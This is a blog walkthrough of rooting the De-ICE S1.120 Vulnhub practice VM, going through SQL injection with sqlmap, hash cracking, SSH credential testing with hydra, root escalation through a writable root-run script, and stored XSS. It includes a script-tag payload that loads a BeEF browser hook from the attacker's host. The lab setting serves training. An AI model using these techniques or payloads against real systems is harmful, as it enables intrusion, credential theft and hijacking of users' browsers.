Pen-testing: De-ICE: S1.120 Walkthrough — Vulnhub

The following is a walkthrough of the De-ICE: S1.120 vulnhub VM. This is a fairly easy machine to root so it’s suitable for beginners.


Reconnaissance

First of all, let’s ping sweep the network to find our target:

Now let’s portscan the target:

We have available a bunch of services: FTP, SSH, HTTP, HTTPS, and MySQL. We can assume there’s a website probably serving some files and consuming the MySQL DB there. Let’s now inspect the services versions:

Summary of the intel gathered:

MAC = 08:00:27:FF:EB:3E
IP = 192.168.1.120
OS = Linux 2.6.X
Services :
21:ftp = ProFTPD 1.3.2
22:ssh = OpenSSH 5.1
80:http = Apache httpd 2.2.11 - PHP 5.2.9
443:https = Apache httpd 2.2.11 - PHP 5.2.9
3306:mysql = MySQL

Now let’s go through the services and see what we can do with them…

FTP

A quick read through ProFTPD’s documentation on the official site reveals there are default credentials for anonymous connections enabled by default. Let’s try this first:

There’s nothing interesting here so it’s time to move on

HTTP/HTTPS

Let’s see what the website is about:

After having inspected the requests manually I detect some possible injection points for SQLi and XSS. I decided to test the product search request first using sqlmap and find that the ‘id’ parameter for the search is injectable:

After having found the injection point, exploiting the vulnerability using sqlmap is trivial. I proceed to extract the database tables list first to get an idea of which tables to dump first:

Then I go after the table ‘user’:

Now that I have all the users and their corresponding password hashes the next step is to try cracking those in order to get access to the system. After identifying the hash type, that turned out to be the default for MySQL DB, I use sqlmap integrated hash cracking option to get the plaintext credentials:

raining passwords

SSH

Right after having found valid credentials the next natural thing to do it’s to test them over ssh to see if we have access to the box. I used hydra to try every combination:

raining logins

All 48 credentials found are valid over SSH. Now the questions are: what type of privileges do they have? is there a root account among them? how can we elevate privileges if none of them have admin privileges? I first try a couple of logins and see what kind of access do the users have :

After some trial and error I find the user named ‘coffee’ has access to an executable file that looks interesting:

getlogs.sh

getlogs.sh can be executed as root and we can modify the file and override the content to serve our purpose of escalating privileges. To test the effectiveness of this I try running the ‘id’ command. Then, as I see that it works, I changed the command to spam a shell as root granting me full access:

Now… regardless of having achieved the goal, I test one more thing:

XSS

I mentioned earlier that I found a possible XSS insertion point so I decided to test it anyway to see the results:

Both fields turned out to be vulnerable:

To exploit this in a more significant way I added a hook to a BeeF server on my local machine using the payload :

<script src=192.168.1.4/h.js></script>

An I got the browser hooked as expected:

Using this an attacker could potentially access the users’ cookies, perform phishing attacks, MITB attacks, scan the network from there and many more things. Even though this vulnerability did not give me root access to the box it can be very dangerous for the users and can lead to exploit other issues present in their machines.

And that’s all… Hope you like this writeup and see you around!


syscall59

Shellcode for the masses

Syscall59 — by Alan Vivona

Written by

Twitter: @syscall59 | medium.syscall59.com | syscall59@protonmail.com

syscall59

syscall59

Shellcode for the masses

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade